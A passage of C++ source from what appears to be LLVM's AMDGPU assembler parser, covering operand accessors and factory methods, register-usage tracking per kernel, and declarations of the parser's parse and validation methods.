const MCSymbolRefExpr *S = cast<MCSymbolRefExpr>(Expr);
return S->getSymbol().getName();
}
StringRef getToken() const {
assert(isToken());
if (Kind == Expression)
return getExpressionAsToken();
return StringRef(Tok.Data, Tok.Length);
}
int64_t getImm() const {
assert(isImm());
return Imm.Val;
}
void setImm(int64_t Val) {
assert(isImm());
Imm.Val = Val;
}
ImmTy getImmTy() const {
assert(isImm());
return Imm.Type;
}
unsigned getReg() const override {
assert(isRegKind());
return Reg.RegNo;
}
SMLoc getStartLoc() const override {
return StartLoc;
}
SMLoc getEndLoc() const override {
return EndLoc;
}
SMRange getLocRange() const {
return SMRange(StartLoc, EndLoc);
}
Modifiers getModifiers() const {
assert(isRegKind() || isImmTy(ImmTyNone));
return isRegKind() ? Reg.Mods : Imm.Mods;
}
void setModifiers(Modifiers Mods) {
assert(isRegKind() || isImmTy(ImmTyNone));
if (isRegKind())
Reg.Mods = Mods;
else
Imm.Mods = Mods;
}
bool hasModifiers() const {
return getModifiers().hasModifiers();
}
bool hasFPModifiers() const {
return getModifiers().hasFPModifiers();
}
bool hasIntModifiers() const {
return getModifiers().hasIntModifiers();
}
uint64_t applyInputFPModifiers(uint64_t Val, unsigned Size) const;
void addImmOperands(MCInst &Inst, unsigned N, bool ApplyModifiers = true) const;
void addLiteralImmOperand(MCInst &Inst, int64_t Val, bool ApplyModifiers) const;
template <unsigned Bitwidth>
void addKImmFPOperands(MCInst &Inst, unsigned N) const;
void addKImmFP16Operands(MCInst &Inst, unsigned N) const {
addKImmFPOperands<16>(Inst, N);
}
void addKImmFP32Operands(MCInst &Inst, unsigned N) const {
addKImmFPOperands<32>(Inst, N);
}
void addRegOperands(MCInst &Inst, unsigned N) const;
void addBoolRegOperands(MCInst &Inst, unsigned N) const {
addRegOperands(Inst, N);
}
void addRegOrImmOperands(MCInst &Inst, unsigned N) const {
if (isRegKind())
addRegOperands(Inst, N);
else if (isExpr())
Inst.addOperand(MCOperand::createExpr(Expr));
else
addImmOperands(Inst, N);
}
void addRegOrImmWithInputModsOperands(MCInst &Inst, unsigned N) const {
Modifiers Mods = getModifiers();
Inst.addOperand(MCOperand::createImm(Mods.getModifiersOperand()));
if (isRegKind()) {
addRegOperands(Inst, N);
} else {
addImmOperands(Inst, N, false);
}
}
void addRegOrImmWithFPInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasIntModifiers());
addRegOrImmWithInputModsOperands(Inst, N);
}
void addRegOrImmWithIntInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasFPModifiers());
addRegOrImmWithInputModsOperands(Inst, N);
}
void addRegWithInputModsOperands(MCInst &Inst, unsigned N) const {
Modifiers Mods = getModifiers();
Inst.addOperand(MCOperand::createImm(Mods.getModifiersOperand()));
assert(isRegKind());
addRegOperands(Inst, N);
}
void addRegWithFPInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasIntModifiers());
addRegWithInputModsOperands(Inst, N);
}
void addRegWithIntInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasFPModifiers());
addRegWithInputModsOperands(Inst, N);
}
void addSoppBrTargetOperands(MCInst &Inst, unsigned N) const {
if (isImm())
addImmOperands(Inst, N);
else {
assert(isExpr());
Inst.addOperand(MCOperand::createExpr(Expr));
}
}
static void printImmTy(raw_ostream& OS, ImmTy Type) {
switch (Type) {
case ImmTyNone: OS << "None"; break;
case ImmTyGDS: OS << "GDS"; break;
case ImmTyLDS: OS << "LDS"; break;
case ImmTyOffen: OS << "Offen"; break;
case ImmTyIdxen: OS << "Idxen"; break;
case ImmTyAddr64: OS << "Addr64"; break;
case ImmTyOffset: OS << "Offset"; break;
case ImmTyInstOffset: OS << "InstOffset"; break;
case ImmTyOffset0: OS << "Offset0"; break;
case ImmTyOffset1: OS << "Offset1"; break;
case ImmTyCPol: OS << "CPol"; break;
case ImmTySWZ: OS << "SWZ"; break;
case ImmTyTFE: OS << "TFE"; break;
case ImmTyD16: OS << "D16"; break;
case ImmTyFORMAT: OS << "FORMAT"; break;
case ImmTyClampSI: OS << "ClampSI"; break;
case ImmTyOModSI: OS << "OModSI"; break;
case ImmTyDPP8: OS << "DPP8"; break;
case ImmTyDppCtrl: OS << "DppCtrl"; break;
case ImmTyDppRowMask: OS << "DppRowMask"; break;
case ImmTyDppBankMask: OS << "DppBankMask"; break;
case ImmTyDppBoundCtrl: OS << "DppBoundCtrl"; break;
case ImmTyDppFi: OS << "FI"; break;
case ImmTySdwaDstSel: OS << "SdwaDstSel"; break;
case ImmTySdwaSrc0Sel: OS << "SdwaSrc0Sel"; break;
case ImmTySdwaSrc1Sel: OS << "SdwaSrc1Sel"; break;
case ImmTySdwaDstUnused: OS << "SdwaDstUnused"; break;
case ImmTyDMask: OS << "DMask"; break;
case ImmTyDim: OS << "Dim"; break;
case ImmTyUNorm: OS << "UNorm"; break;
case ImmTyDA: OS << "DA"; break;
case ImmTyR128A16: OS << "R128A16"; break;
case ImmTyA16: OS << "A16"; break;
case ImmTyLWE: OS << "LWE"; break;
case ImmTyOff: OS << "Off"; break;
case ImmTyExpTgt: OS << "ExpTgt"; break;
case ImmTyExpCompr: OS << "ExpCompr"; break;
case ImmTyExpVM: OS << "ExpVM"; break;
case ImmTyHwreg: OS << "Hwreg"; break;
case ImmTySendMsg: OS << "SendMsg"; break;
case ImmTyInterpSlot: OS << "InterpSlot"; break;
case ImmTyInterpAttr: OS << "InterpAttr"; break;
case ImmTyAttrChan: OS << "AttrChan"; break;
case ImmTyOpSel: OS << "OpSel"; break;
case ImmTyOpSelHi: OS << "OpSelHi"; break;
case ImmTyNegLo: OS << "NegLo"; break;
case ImmTyNegHi: OS << "NegHi"; break;
case ImmTySwizzle: OS << "Swizzle"; break;
case ImmTyGprIdxMode: OS << "GprIdxMode"; break;
case ImmTyHigh: OS << "High"; break;
case ImmTyBLGP: OS << "BLGP"; break;
case ImmTyCBSZ: OS << "CBSZ"; break;
case ImmTyABID: OS << "ABID"; break;
case ImmTyEndpgm: OS << "Endpgm"; break;
}
}
void print(raw_ostream &OS) const override {
switch (Kind) {
case Register:
OS << "<register " << getReg() << " mods: " << Reg.Mods << '>';
break;
case Immediate:
OS << '<' << getImm();
if (getImmTy() != ImmTyNone) {
OS << " type: "; printImmTy(OS, getImmTy());
}
OS << " mods: " << Imm.Mods << '>';
break;
case Token:
OS << '\'' << getToken() << '\'';
break;
case Expression:
OS << "<expr " << *Expr << '>';
break;
}
}
static AMDGPUOperand::Ptr CreateImm(const AMDGPUAsmParser *AsmParser,
int64_t Val, SMLoc Loc,
ImmTy Type = ImmTyNone,
bool IsFPImm = false) {
auto Op = std::make_unique<AMDGPUOperand>(Immediate, AsmParser);
Op->Imm.Val = Val;
Op->Imm.IsFPImm = IsFPImm;
Op->Imm.Kind = ImmKindTyNone;
Op->Imm.Type = Type;
Op->Imm.Mods = Modifiers();
Op->StartLoc = Loc;
Op->EndLoc = Loc;
return Op;
}
static AMDGPUOperand::Ptr CreateToken(const AMDGPUAsmParser *AsmParser,
StringRef Str, SMLoc Loc,
bool HasExplicitEncodingSize = true) {
auto Res = std::make_unique<AMDGPUOperand>(Token, AsmParser);
Res->Tok.Data = Str.data();
Res->Tok.Length = Str.size();
Res->StartLoc = Loc;
Res->EndLoc = Loc;
return Res;
}
static AMDGPUOperand::Ptr CreateReg(const AMDGPUAsmParser *AsmParser,
unsigned RegNo, SMLoc S,
SMLoc E) {
auto Op = std::make_unique<AMDGPUOperand>(Register, AsmParser);
Op->Reg.RegNo = RegNo;
Op->Reg.Mods = Modifiers();
Op->StartLoc = S;
Op->EndLoc = E;
return Op;
}
static AMDGPUOperand::Ptr CreateExpr(const AMDGPUAsmParser *AsmParser,
const class MCExpr *Expr, SMLoc S) {
auto Op = std::make_unique<AMDGPUOperand>(Expression, AsmParser);
Op->Expr = Expr;
Op->StartLoc = S;
Op->EndLoc = S;
return Op;
}
};
raw_ostream &operator <<(raw_ostream &OS, AMDGPUOperand::Modifiers Mods) {
OS << "abs:" << Mods.Abs << " neg: " << Mods.Neg << " sext:" << Mods.Sext;
return OS;
}
//===----------------------------------------------------------------------===//
// AsmParser
//===----------------------------------------------------------------------===//
// Holds info related to the current kernel, e.g. count of SGPRs used.
// Kernel scope begins at .amdgpu_hsa_kernel directive, ends at next
// .amdgpu_hsa_kernel or at EOF.
class KernelScopeInfo {
int SgprIndexUnusedMin = -1;
int VgprIndexUnusedMin = -1;
int AgprIndexUnusedMin = -1;
MCContext *Ctx = nullptr;
MCSubtargetInfo const *MSTI = nullptr;
void usesSgprAt(int i) {
if (i >= SgprIndexUnusedMin) {
SgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.sgpr_count"));
Sym->setVariableValue(MCConstantExpr::create(SgprIndexUnusedMin, *Ctx));
}
}
}
void usesVgprAt(int i) {
if (i >= VgprIndexUnusedMin) {
VgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.vgpr_count"));
int totalVGPR = getTotalNumVGPRs(isGFX90A(*MSTI), AgprIndexUnusedMin,
VgprIndexUnusedMin);
Sym->setVariableValue(MCConstantExpr::create(totalVGPR, *Ctx));
}
}
}
void usesAgprAt(int i) {
// Instruction will error in AMDGPUAsmParser::MatchAndEmitInstruction
if (!hasMAIInsts(*MSTI))
return;
if (i >= AgprIndexUnusedMin) {
AgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.agpr_count"));
Sym->setVariableValue(MCConstantExpr::create(AgprIndexUnusedMin, *Ctx));
// Also update vgpr_count (dependent on agpr_count for gfx908/gfx90a)
MCSymbol* const vSym =
Ctx->getOrCreateSymbol(Twine(".kernel.vgpr_count"));
int totalVGPR = getTotalNumVGPRs(isGFX90A(*MSTI), AgprIndexUnusedMin,
VgprIndexUnusedMin);
vSym->setVariableValue(MCConstantExpr::create(totalVGPR, *Ctx));
}
}
}
public:
KernelScopeInfo() = default;
void initialize(MCContext &Context) {
Ctx = &Context;
MSTI = Ctx->getSubtargetInfo();
usesSgprAt(SgprIndexUnusedMin = -1);
usesVgprAt(VgprIndexUnusedMin = -1);
if (hasMAIInsts(*MSTI)) {
usesAgprAt(AgprIndexUnusedMin = -1);
}
}
void usesRegister(RegisterKind RegKind, unsigned DwordRegIndex, unsigned RegWidth) {
switch (RegKind) {
case IS_SGPR: usesSgprAt(DwordRegIndex + RegWidth - 1); break;
case IS_AGPR: usesAgprAt(DwordRegIndex + RegWidth - 1); break;
case IS_VGPR: usesVgprAt(DwordRegIndex + RegWidth - 1); break;
default: break;
}
}
};
class AMDGPUAsmParser : public MCTargetAsmParser {
MCAsmParser &Parser;
// Number of extra operands parsed after the first optional operand.
// This may be necessary to skip hardcoded mandatory operands.
static const unsigned MAX_OPR_LOOKAHEAD = 8;
unsigned ForcedEncodingSize = 0;
bool ForcedDPP = false;
bool ForcedSDWA = false;
KernelScopeInfo KernelScope;
unsigned CPolSeen;
/// @name Auto-generated Match Functions
/// {
#define GET_ASSEMBLER_HEADER
#include "AMDGPUGenAsmMatcher.inc"
/// }
private:
bool ParseAsAbsoluteExpression(uint32_t &Ret);
bool OutOfRangeError(SMRange Range);
/// Calculate VGPR/SGPR blocks required for given target, reserved
/// registers, and user-specified NextFreeXGPR values.
///
/// \param Features [in] Target features, used for bug corrections.
/// \param VCCUsed [in] Whether VCC special SGPR is reserved.
/// \param FlatScrUsed [in] Whether FLAT_SCRATCH special SGPR is reserved.
/// \param XNACKUsed [in] Whether XNACK_MASK special SGPR is reserved.
/// \param EnableWavefrontSize32 [in] Value of ENABLE_WAVEFRONT_SIZE32 kernel
/// descriptor field, if valid.
/// \param NextFreeVGPR [in] Max VGPR number referenced, plus one.
/// \param VGPRRange [in] Token range, used for VGPR diagnostics.
/// \param NextFreeSGPR [in] Max SGPR number referenced, plus one.
/// \param SGPRRange [in] Token range, used for SGPR diagnostics.
/// \param VGPRBlocks [out] Result VGPR block count.
/// \param SGPRBlocks [out] Result SGPR block count.
bool calculateGPRBlocks(const FeatureBitset &Features, bool VCCUsed,
bool FlatScrUsed, bool XNACKUsed,
Optional<bool> EnableWavefrontSize32, unsigned NextFreeVGPR,
SMRange VGPRRange, unsigned NextFreeSGPR,
SMRange SGPRRange, unsigned &VGPRBlocks,
unsigned &SGPRBlocks);
bool ParseDirectiveAMDGCNTarget();
bool ParseDirectiveAMDHSAKernel();
bool ParseDirectiveMajorMinor(uint32_t &Major, uint32_t &Minor);
bool ParseDirectiveHSACodeObjectVersion();
bool ParseDirectiveHSACodeObjectISA();
bool ParseAMDKernelCodeTValue(StringRef ID, amd_kernel_code_t &Header);
bool ParseDirectiveAMDKernelCodeT();
// TODO: Possibly make subtargetHasRegister const.
bool subtargetHasRegister(const MCRegisterInfo &MRI, unsigned RegNo);
bool ParseDirectiveAMDGPUHsaKernel();
bool ParseDirectiveISAVersion();
bool ParseDirectiveHSAMetadata();
bool ParseDirectivePALMetadataBegin();
bool ParseDirectivePALMetadata();
bool ParseDirectiveAMDGPULDS();
/// Common code to parse out a block of text (typically YAML) between start and
/// end directives.
bool ParseToEndDirective(const char *AssemblerDirectiveBegin,
const char *AssemblerDirectiveEnd,
std::string &CollectString);
bool AddNextRegisterToList(unsigned& Reg, unsigned& RegWidth,
RegisterKind RegKind, unsigned Reg1, SMLoc Loc);
bool ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
bool RestoreOnFailure = false);
bool ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseRegularReg(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseSpecialReg(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseRegList(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth, SmallVectorImpl<AsmToken> &Tokens);
bool ParseRegRange(unsigned& Num, unsigned& Width);
unsigned getRegularReg(RegisterKind RegKind,
unsigned RegNum,
unsigned RegWidth,
SMLoc Loc);
bool isRegister();
bool isRegister(const AsmToken &Token, const AsmToken &NextToken) const;
Optional<StringRef> getGprCountSymbolName(RegisterKind RegKind);
void initializeGprCountSymbol(RegisterKind RegKind);
bool updateGprCountSymbols(RegisterKind RegKind, unsigned DwordRegIndex,
unsigned RegWidth);
void cvtMubufImpl(MCInst &Inst, const OperandVector &Operands,
bool IsAtomic, bool IsLds = false);
void cvtDSImpl(MCInst &Inst, const OperandVector &Operands,
bool IsGdsHardcoded);
public:
enum AMDGPUMatchResultTy {
Match_PreferE32 = FIRST_TARGET_MATCH_RESULT_TY
};
enum OperandMode {
OperandMode_Default,
OperandMode_NSA,
};
using OptionalImmIndexMap = std::map<AMDGPUOperand::ImmTy, unsigned>;
AMDGPUAsmParser(const MCSubtargetInfo &STI, MCAsmParser &_Parser,
const MCInstrInfo &MII,
const MCTargetOptions &Options)
: MCTargetAsmParser(Options, STI, MII), Parser(_Parser) {
MCAsmParserExtension::Initialize(Parser);
if (getFeatureBits().none()) {
// Set default features.
copySTI().ToggleFeature("southern-islands");
}
setAvailableFeatures(ComputeAvailableFeatures(getFeatureBits()));
{
// TODO: make those pre-defined variables read-only.
// Currently there is none suitable machinery in the core llvm-mc for this.
// MCSymbol::isRedefinable is intended for another purpose, and
// AsmParser::parseDirectiveSet() cannot be specialized for specific target.
AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
MCContext &Ctx = getContext();
if (ISA.Major >= 6 && isHsaAbiVersion3AndAbove(&getSTI())) {
MCSymbol *Sym =
Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_number"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Major, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_minor"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Minor, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".amdgcn.gfx_generation_stepping"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Stepping, Ctx));
} else {
MCSymbol *Sym =
Ctx.getOrCreateSymbol(Twine(".option.machine_version_major"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Major, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".option.machine_version_minor"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Minor, Ctx));
Sym = Ctx.getOrCreateSymbol(Twine(".option.machine_version_stepping"));
Sym->setVariableValue(MCConstantExpr::create(ISA.Stepping, Ctx));
}
if (ISA.Major >= 6 && isHsaAbiVersion3AndAbove(&getSTI())) {
initializeGprCountSymbol(IS_VGPR);
initializeGprCountSymbol(IS_SGPR);
} else
KernelScope.initialize(getContext());
}
}
bool hasMIMG_R128() const {
return AMDGPU::hasMIMG_R128(getSTI());
}
bool hasPackedD16() const {
return AMDGPU::hasPackedD16(getSTI());
}
bool hasGFX10A16() const {
return AMDGPU::hasGFX10A16(getSTI());
}
bool hasG16() const { return AMDGPU::hasG16(getSTI()); }
bool isSI() const {
return AMDGPU::isSI(getSTI());
}
bool isCI() const {
return AMDGPU::isCI(getSTI());
}
bool isVI() const {
return AMDGPU::isVI(getSTI());
}
bool isGFX9() const {
return AMDGPU::isGFX9(getSTI());
}
bool isGFX90A() const {
return AMDGPU::isGFX90A(getSTI());
}
bool isGFX9Plus() const {
return AMDGPU::isGFX9Plus(getSTI());
}
bool isGFX10() const {
return AMDGPU::isGFX10(getSTI());
}
bool isGFX10Plus() const { return AMDGPU::isGFX10Plus(getSTI()); }
bool isGFX10_BEncoding() const {
return AMDGPU::isGFX10_BEncoding(getSTI());
}
bool hasInv2PiInlineImm() const {
return getFeatureBits()[AMDGPU::FeatureInv2PiInlineImm];
}
bool hasFlatOffsets() const {
return getFeatureBits()[AMDGPU::FeatureFlatInstOffsets];
}
bool hasArchitectedFlatScratch() const {
return getFeatureBits()[AMDGPU::FeatureArchitectedFlatScratch];
}
bool hasSGPR102_SGPR103() const {
return !isVI() && !isGFX9();
}
bool hasSGPR104_SGPR105() const { return isGFX10Plus(); }
bool hasIntClamp() const {
return getFeatureBits()[AMDGPU::FeatureIntClamp];
}
AMDGPUTargetStreamer &getTargetStreamer() {
MCTargetStreamer &TS = *getParser().getStreamer().getTargetStreamer();
return static_cast<AMDGPUTargetStreamer &>(TS);
}
const MCRegisterInfo *getMRI() const {
// We need this const_cast because for some reason getContext() is not const
// in MCAsmParser.
return const_cast<AMDGPUAsmParser*>(this)->getContext().getRegisterInfo();
}
const MCInstrInfo *getMII() const {
return &MII;
}
const FeatureBitset &getFeatureBits() const {
return getSTI().getFeatureBits();
}
void setForcedEncodingSize(unsigned Size) { ForcedEncodingSize = Size; }
void setForcedDPP(bool ForceDPP_) { ForcedDPP = ForceDPP_; }
void setForcedSDWA(bool ForceSDWA_) { ForcedSDWA = ForceSDWA_; }
unsigned getForcedEncodingSize() const { return ForcedEncodingSize; }
bool isForcedVOP3() const { return ForcedEncodingSize == 64; }
bool isForcedDPP() const { return ForcedDPP; }
bool isForcedSDWA() const { return ForcedSDWA; }
ArrayRef<unsigned> getMatchedVariants() const;
StringRef getMatchedVariantName() const;
std::unique_ptr<AMDGPUOperand> parseRegister(bool RestoreOnFailure = false);
bool ParseRegister(unsigned &RegNo, SMLoc &StartLoc, SMLoc &EndLoc,
bool RestoreOnFailure);
bool ParseRegister(unsigned &RegNo, SMLoc &StartLoc, SMLoc &EndLoc) override;
OperandMatchResultTy tryParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc) override;
unsigned checkTargetMatchPredicate(MCInst &Inst) override;
unsigned validateTargetOperandClass(MCParsedAsmOperand &Op,
unsigned Kind) override;
bool MatchAndEmitInstruction(SMLoc IDLoc, unsigned &Opcode,
OperandVector &Operands, MCStreamer &Out,
uint64_t &ErrorInfo,
bool MatchingInlineAsm) override;
bool ParseDirective(AsmToken DirectiveID) override;
OperandMatchResultTy parseOperand(OperandVector &Operands, StringRef Mnemonic,
OperandMode Mode = OperandMode_Default);
StringRef parseMnemonicSuffix(StringRef Name);
bool ParseInstruction(ParseInstructionInfo &Info, StringRef Name,
SMLoc NameLoc, OperandVector &Operands) override;
//bool ProcessInstruction(MCInst &Inst);
OperandMatchResultTy parseIntWithPrefix(const char *Prefix, int64_t &Int);
OperandMatchResultTy
parseIntWithPrefix(const char *Prefix, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone,
bool (*ConvertResult)(int64_t &) = nullptr);
OperandMatchResultTy
parseOperandArrayWithPrefix(const char *Prefix,
OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone,
bool (*ConvertResult)(int64_t&) = nullptr);
OperandMatchResultTy
parseNamedBit(StringRef Name, OperandVector &Operands,
AMDGPUOperand::ImmTy ImmTy = AMDGPUOperand::ImmTyNone);
OperandMatchResultTy parseCPol(OperandVector &Operands);
OperandMatchResultTy parseStringWithPrefix(StringRef Prefix,
StringRef &Value,
SMLoc &StringLoc);
bool isModifier();
bool isOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isRegOrOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isNamedOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const;
bool isOpcodeModifierWithVal(const AsmToken &Token, const AsmToken &NextToken) const;
bool parseSP3NegModifier();
OperandMatchResultTy parseImm(OperandVector &Operands, bool HasSP3AbsModifier = false);
OperandMatchResultTy parseReg(OperandVector &Operands);
OperandMatchResultTy parseRegOrImm(OperandVector &Operands, bool HasSP3AbsMod = false);
OperandMatchResultTy parseRegOrImmWithFPInputMods(OperandVector &Operands, bool AllowImm = true);
OperandMatchResultTy parseRegOrImmWithIntInputMods(OperandVector &Operands, bool AllowImm = true);
OperandMatchResultTy parseRegWithFPInputMods(OperandVector &Operands);
OperandMatchResultTy parseRegWithIntInputMods(OperandVector &Operands);
OperandMatchResultTy parseVReg32OrOff(OperandVector &Operands);
OperandMatchResultTy parseDfmtNfmt(int64_t &Format);
OperandMatchResultTy parseUfmt(int64_t &Format);
OperandMatchResultTy parseSymbolicSplitFormat(StringRef FormatStr, SMLoc Loc, int64_t &Format);
OperandMatchResultTy parseSymbolicUnifiedFormat(StringRef FormatStr, SMLoc Loc, int64_t &Format);
OperandMatchResultTy parseFORMAT(OperandVector &Operands);
OperandMatchResultTy parseSymbolicOrNumericFormat(int64_t &Format);
OperandMatchResultTy parseNumericFormat(int64_t &Format);
bool tryParseFmt(const char *Pref, int64_t MaxVal, int64_t &Val);
bool matchDfmtNfmt(int64_t &Dfmt, int64_t &Nfmt, StringRef FormatStr, SMLoc Loc);
void cvtDSOffset01(MCInst &Inst, const OperandVector &Operands);
void cvtDS(MCInst &Inst, const OperandVector &Operands) { cvtDSImpl(Inst, Operands, false); }
void cvtDSGds(MCInst &Inst, const OperandVector &Operands) { cvtDSImpl(Inst, Operands, true); }
void cvtExp(MCInst &Inst, const OperandVector &Operands);
bool parseCnt(int64_t &IntVal);
OperandMatchResultTy parseSWaitCntOps(OperandVector &Operands);
OperandMatchResultTy parseHwreg(OperandVector &Operands);
private:
struct OperandInfoTy {
SMLoc Loc;
int64_t Id;
bool IsSymbolic = false;
bool IsDefined = false;
OperandInfoTy(int64_t Id_) : Id(Id_) {}
};
bool parseSendMsgBody(OperandInfoTy &Msg, OperandInfoTy &Op, OperandInfoTy &Stream);
bool validateSendMsg(const OperandInfoTy &Msg,
const OperandInfoTy &Op,
const OperandInfoTy &Stream);
bool parseHwregBody(OperandInfoTy &HwReg,
OperandInfoTy &Offset,
OperandInfoTy &Width);
bool validateHwreg(const OperandInfoTy &HwReg,
const OperandInfoTy &Offset,
const OperandInfoTy &Width);
SMLoc getFlatOffsetLoc(const OperandVector &Operands) const;
SMLoc getSMEMOffsetLoc(const OperandVector &Operands) const;
SMLoc getOperandLoc(std::function<bool(const AMDGPUOperand&)> Test,
const OperandVector &Operands) const;
SMLoc getImmLoc(AMDGPUOperand::ImmTy Type, const OperandVector &Operands) const;
SMLoc getRegLoc(unsigned Reg, const OperandVector &Operands) const;
SMLoc getLitLoc(const OperandVector &Operands) const;
SMLoc getConstLoc(const OperandVector &Operands) const;
bool validateInstruction(const MCInst &Inst, const SMLoc &IDLoc, const OperandVector &Operands);
bool validateFlatOffset(const MCInst &Inst, const OperandVector &Operands);
bool validateSMEMOffset(const MCInst &Inst, const OperandVector &Operands);
bool validateSOPLiteral(const MCInst &Inst) const;
bool validateConstantBusLimitations(const MCInst &Inst, const OperandVector &Operands);
bool validateEarlyClobberLimitations(const MCInst &Inst, const OperandVector &Operands);
bool validateIntClampSupported(const MCInst &Inst);
bool validateMIMGAtomicDMask(const MCInst &Inst);
bool validateMIMGGatherDMask(const MCInst &Inst);
bool validateMovrels(const MCInst &Inst, const OperandVector &Operands);
bool validateMIMGDataSize(const MCInst &Inst);
bool validateMIMGAddrSize(const MCInst &Inst);
bool validateMIMGD16(const MCInst &Inst);
bool validateMIMGDim(const MCInst &Inst);
bool validateMIMGMSAA(const MCInst &Inst);
bool validateOpSel(const MCInst &Inst);
bool validateDPP(const MCInst &Inst, const OperandVector &Operands);
bool validateVccOperand(unsigned Reg) const;
bool validateVOPLiteral(const MCInst &Inst, const OperandVector &Operands);
bool validateMAIAccWrite(const MCInst &Inst, const OperandVector &Operands);
bool validateMFMA(const MCInst &Inst, const OperandVector &Operands);
bool validateAGPRLdSt(const MCInst &Inst) const;
bool validateVGPRAlign(const MCInst &Inst) const;
bool validateGWS(const MCInst &Inst, const OperandVector &Operands);
bool validateDivScale(const MCInst &Inst);
bool validateCoherencyBits(const MCInst &Inst, const OperandVector &Operands,
const SMLoc &IDLoc);
Optional<StringRef> validateLdsDirect(const MCInst &Inst);
unsigned getConstantBusLimit(unsigned Opcode) const;
bool usesConstantBus(const MCInst &Inst, unsigned OpIdx);
bool isInlineConstant(const MCInst &Inst, unsigned OpIdx) const;
unsigned findImplicitSGPRReadInVOP(const MCInst &Inst) const;
bool isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS);
bool isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS,
ArrayRef<unsigned> Variants);
bool checkUnsupportedInstruction(StringRef Name, const SMLoc &IDLoc);
bool isId(const StringRef Id) const;
bool isId(const AsmToken &Token, const StringRef Id) const;
bool isToken(const AsmToken::TokenKind Kind) const;
bool trySkipId(const StringRef Id);
bool trySkipId(const StringRef Pref, const StringRef Id);
bool trySkipId(const StringRef Id, const AsmToken::TokenKind Kind);
bool trySkipToken(const AsmToken::TokenKind Kind);
bool skipToken(const AsmToken::TokenKind Kind, const StringRef ErrMsg);
bool parseString(StringRef &Val, const StringRef ErrMsg = "expected a string");
bool parseId(StringRef &Val, const StringRef ErrMsg = "");
void peekTokens(MutableArrayRef<AsmToken> Tokens);
AsmToken::TokenKind getTokenKind() const;
bool parseExpr(int64_t &Imm, StringRef Expected = "");
bool parseExpr(OperandVector &Operands);
StringRef getTokenStr() const;
AsmToken peekToken();
AsmToken getToken() const;
SMLoc getLoc() const;
void lex();
public:
void onBeginOfFile() override;
OperandMatchResultTy parseOptionalOperand(OperandVector &Operands);
OperandMatchResultTy parseOptionalOpr(OperandVector &Operands);
OperandMatchResultTy parseExpTgt(OperandVector &Operands);
OperandMatchResultTy parseSendMsgOp(OperandVector &Operands);
OperandMatchResultTy parseInterpSlot(OperandVector &Operands);
OperandMatchResultTy parseInterpAttr(OperandVector &Operands);
OperandMatchResultTy parseSOppBrTarget(OperandVector &Operands);
OperandMatchResultTy parseBoolReg(OperandVector &Operands);
bool parseSwizzleOperand(int64_t &Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg,
SMLoc &Loc);
bool parseSwizzleOperands(const unsigned OpNum, int64_t* Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg);
OperandMatchResultTy parseSwizzleOp(OperandVector &Operands);
bool parseSwizzleOffset(int64_t &Imm);
bool parseSwizzleMacro(int64_t &Imm);
bool parseSwizzleQuadPerm(int64_t &Imm);
bool parseSwizzleBitmaskPerm(int64_t &Imm);
bool parseSwizzleBroadcast(int64_t &Imm);
bool parseSwizzleSwap(int64_t &Imm);
bool parseSwizzleReverse(int64_t &Imm);
OperandMatchResultTy parseGPRIdxMode(OperandVector &Operands);
int64_t parseGPRIdxMacro();
void cvtMubuf(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, false); }
void cvtMubufAtomic(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, true); }
void cvtMubufLds(MCInst &Inst, const OperandVector &Operands) { cvtMubufImpl(Inst, Operands, false, true); }
void cvtMtbuf(MCInst &Inst, const OperandVector &Operands);
AMDGPUOperand::Ptr defaultCPol() const;
AMDGPUOperand::Ptr defaultSMRDOffset8() const;
AMDGPUOperand::Ptr defaultSMEMOffset() const;
AMDGPUOperand::Ptr defaultSMRDLiteralOffset() const;
AMDGPUOperand::Ptr defaultFlatOffset() const;
OperandMatchResultTy parseOModOperand(OperandVector &Operands);
void cvtVOP3(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx);
void cvtVOP3OpSel(MCInst &Inst, const OperandVector &Operands);
void cvtVOP3(MCInst &Inst, const OperandVector &Operands);
void cvtVOP3P(MCInst &Inst, const OperandVector &Operands);
